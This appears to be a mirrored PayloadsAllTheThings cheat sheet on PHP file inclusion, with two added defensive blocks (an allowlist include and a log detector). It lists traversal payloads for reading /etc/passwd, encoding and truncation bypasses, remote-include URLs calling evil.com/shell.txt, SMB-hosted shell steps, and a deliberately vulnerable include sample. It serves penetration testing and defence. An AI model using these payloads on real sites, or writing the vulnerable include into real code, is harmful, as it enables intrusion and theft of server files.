mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-22 11:18:50 +00:00
157 lines
6.4 KiB
Markdown
# File Inclusion
> A File Inclusion Vulnerability refers to a type of security vulnerability in web applications, particularly prevalent in applications developed in PHP, where an attacker can include a file, usually exploiting a lack of proper input/output sanitization. This vulnerability can lead to a range of malicious activities, including code execution, data theft, and website defacement.
## Summary
- [Tools](#tools)
- [Local File Inclusion](#local-file-inclusion)
    - [Null Byte](#null-byte)
    - [Double Encoding](#double-encoding)
    - [UTF-8 Encoding](#utf-8-encoding)
    - [Path Truncation](#path-truncation)
    - [Filter Bypass](#filter-bypass)
- [Remote File Inclusion](#remote-file-inclusion)
    - [Null Byte](#null-byte-1)
    - [Double Encoding](#double-encoding-1)
    - [Bypass allow_url_include](#bypass-allow_url_include)
- [Labs](#labs)
- [References](#references)

## Tools
* [P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus) (archived on Oct 7, 2020) - Kadimus is a tool to check for and exploit LFI vulnerabilities.
* [D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite) - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner
* [kurobeats/fimap](https://github.com/kurobeats/fimap) - fimap is a little Python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in web apps.
* [lightos/Panoptic](https://github.com/lightos/Panoptic) - Panoptic is an open source penetration testing tool that automates the process of search and retrieval of content for common log and config files through path traversal vulnerabilities.
* [hansmach1ne/LFImap](https://github.com/hansmach1ne/LFImap) - Local File Inclusion discovery and exploitation tool

## Local File Inclusion

**File Inclusion Vulnerability** should be differentiated from **Path Traversal**. The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application, whereas File Inclusion leads to the execution of arbitrary code.

Consider a PHP script that includes a file based on user input. If proper sanitization is not in place, an attacker could manipulate the `page` parameter to include local or remote files, leading to unauthorized access or code execution.

```php
<?php
$file = $_GET['page'];
include($file);
?>
```
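As an added example (not code from PayloadsAllTheThings), the vulnerable include above is shown next to a naive blocklist filter and an allowlist-based replacement; `naive_filter`, `resolve_page`, the `PAGES` map and the `pages/` directory are hypothetical names.

```php
<?php
// Added example, not from PayloadsAllTheThings: a naive blocklist filter next
// to an allowlist-based include. Names (naive_filter, resolve_page, PAGES)
// are hypothetical.

// Naive mitigation: strip "../" once. A single str_replace pass is defeated
// by the "....//" payload from the Filter Bypass section, because removing the
// inner "../" leaves the surrounding characters to form a new "../".
function naive_filter(string $page): string {
    return str_replace('../', '', $page);
}

// Hardened include: user input is only ever a key into a fixed map, so no
// encoding trick, null byte or truncation can select another file.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(string $page, string $baseDir): ?string {
    if (!array_key_exists($page, PAGES)) {
        return null;                        // unknown key: refuse
    }
    // Defence in depth: confirm the resolved file still lives under $baseDir,
    // so a later edit of PAGES cannot silently introduce a traversal.
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$page]);
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Constructed input showing the naive filter failing: the result is still a traversal.
assert(naive_filter('....//....//etc/passwd') === '../../etc/passwd');

// Request handling: never pass $_GET['page'] to include() directly.
$page   = $_GET['page'] ?? 'home';
$target = is_string($page) ? resolve_page($page, __DIR__ . '/pages') : null;
if ($target === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $target;
```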

In the following examples we include the `/etc/passwd` file; check the `Directory & Path Traversal` chapter for more interesting files.

```powershell
http://example.com/index.php?page=../../../etc/passwd
```

### Null Byte

:warning: In versions of PHP below 5.3.4 we can terminate the path with a null byte (`%00`).

```powershell
http://example.com/index.php?page=../../../etc/passwd%00
```

**Example**: Joomla! Component Web TV 1.0 - CVE-2010-1470
```ps1
{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00
```

### Double Encoding
```powershell
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
```

### UTF-8 Encoding
```powershell
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
```

### Path Truncation

On most PHP installations a filename longer than `4096` bytes is truncated, so any excess characters are discarded.

```powershell
http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE]
http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd
```

### Filter Bypass
```powershell
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
```

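An added detection example, not from the original page: it normalises the `page` parameter of access-log requests the same way the Null Byte, Double Encoding, UTF-8 Encoding, Path Truncation and Filter Bypass payloads above rely on, flags each technique, and also goes one step further by flagging remote (URL or UNC) includes. The log lines are constructed, and `normalize_page` / `inspect_request` are hypothetical names.

```php
<?php
// Added example, not from PayloadsAllTheThings: flag file-inclusion attempts
// in access logs by normalising the `page` parameter the same way the bypasses
// above rely on. normalize_page and inspect_request are hypothetical names.

function normalize_page(string $value): string {
    $s = $value;
    // Decode until stable (at most 3 rounds) to unwrap double encoding
    // (%252e -> %2e -> '.'); %00 becomes a real NUL byte here.
    for ($i = 0; $i < 3; $i++) {
        $decoded = rawurldecode($s);
        if ($decoded === $s) break;
        $s = $decoded;
    }
    // Overlong UTF-8 forms of '.' (C0 AE) and '/' (C0 AF) used to evade filters.
    $s = str_replace(["\xC0\xAE", "\xC0\xAF"], ['.', '/'], $s);
    // Backslashes act as separators (Windows, UNC paths); fold them to '/'.
    return str_replace('\\', '/', $s);
}

function inspect_request(string $requestTarget): array {
    $qpos = strpos($requestTarget, '?');
    if ($qpos === false) return [];
    // Match on the raw query; parse_str() would decode once and hide the encoding.
    if (!preg_match('/(?:^|&)page=([^&]*)/', substr($requestTarget, $qpos + 1), $m)) return [];
    $raw  = $m[1];
    $norm = normalize_page($raw);
    $flags = [];
    if (strpos($norm, "\0") !== false)    $flags[] = 'null-byte';
    if (stripos($raw, '%25') !== false)   $flags[] = 'double-encoding';
    if (stripos($raw, '%c0%a') !== false) $flags[] = 'overlong-utf8';
    if (strlen($raw) > 4096)              $flags[] = 'path-truncation';
    if (strpos($norm, '../') !== false)   $flags[] = 'traversal';
    // http://, smb://, protocol-relative //host and UNC \\host (folded to //host).
    if (preg_match('#^(?:[a-z][a-z0-9+.-]*:)?//#i', $norm)) $flags[] = 'remote-include';
    return $flags;
}

// Constructed sample lines (Apache combined log format, abbreviated).
$lines = [
    '10.0.0.5 - - [22/Jan/2025:11:18:50 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '10.0.0.9 - - [22/Jan/2025:11:19:02 +0000] "GET /index.php?page=%252e%252e%252fetc%252fpasswd%00 HTTP/1.1" 200 1984',
    '10.0.0.9 - - [22/Jan/2025:11:19:10 +0000] "GET /index.php?page=....//....//etc/passwd HTTP/1.1" 200 1984',
    '10.0.0.9 - - [22/Jan/2025:11:19:15 +0000] "GET /index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 200 1984',
    '10.0.0.9 - - [22/Jan/2025:11:19:21 +0000] "GET /index.php?page=\\\\10.0.0.1\\share\\shell.php HTTP/1.1" 500 0',
];
foreach ($lines as $line) {
    if (!preg_match('/"(?:GET|POST) (\S+) /', $line, $m)) continue;
    $flags = inspect_request($m[1]);
    printf("%-55s %s\n", substr($m[1], 0, 55), $flags ? implode(',', $flags) : 'clean');
}
```

Run it with `php detect.php` (any filename) against the embedded lines, or replace `$lines` with `file('access.log')` to sweep a real log.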
## Remote File Inclusion
> Remote File Inclusion (RFI) is a type of vulnerability that occurs when an application includes a remote file, usually through user input, without properly validating or sanitizing the input.

Remote File Inclusion no longer works on a default configuration, since `allow_url_include` has been disabled by default since PHP 5; it only works when the setting is explicitly enabled:

```ini
allow_url_include = On
```

Most of the filter bypasses from the LFI section can be reused for RFI.

```powershell
http://example.com/index.php?page=http://evil.com/shell.txt
```

### Null Byte
```powershell
http://example.com/index.php?page=http://evil.com/shell.txt%00
```

### Double Encoding
```powershell
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
```

### Bypass allow_url_include
When `allow_url_include` and `allow_url_fopen` are set to `Off`, it is still possible to include a remote file on a Windows box using the `smb` protocol.

1. Create a share open to everyone
2. Write PHP code inside a file: `shell.php`
3. Include it: `http://example.com/index.php?page=\\10.0.0.1\share\shell.php`

## Labs
* [Root Me - Local File Inclusion](https://www.root-me.org/en/Challenges/Web-Server/Local-File-Inclusion)
* [Root Me - Local File Inclusion - Double encoding](https://www.root-me.org/en/Challenges/Web-Server/Local-File-Inclusion-Double-encoding)
* [Root Me - Remote File Inclusion](https://www.root-me.org/en/Challenges/Web-Server/Remote-File-Inclusion)
* [Root Me - PHP - Filters](https://www.root-me.org/en/Challenges/Web-Server/PHP-Filters)

## References
* [CVV #1: Local File Inclusion - SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction - Mannu Linux - 2019-05-12](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html)
* [Is PHP vulnerable and under what conditions? - Andreas Venieris - April 13, 2015](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html)
* [LFI Cheat Sheet - @Arr0way - 24 Apr 2016](https://highon.coffee/blog/lfi-cheat-sheet/)
* [Testing for Local File Inclusion - OWASP - 25 June 2017](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
* [Turning LFI into RFI - Grayson Christopher - 2017-08-14](https://web.archive.org/web/20170815004721/https://l.avala.mp/?p=241)